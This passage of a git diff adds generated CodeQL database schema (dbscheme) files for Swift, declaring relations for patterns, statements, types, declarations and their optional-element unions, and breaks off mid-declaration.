+@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: @is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| @pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| @labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme new file mode 100644 index 00000000000..33db81ad4b6 --- /dev/null +++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme @@ -0,0 +1,2793 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: @availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: @unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + +@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + +initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: 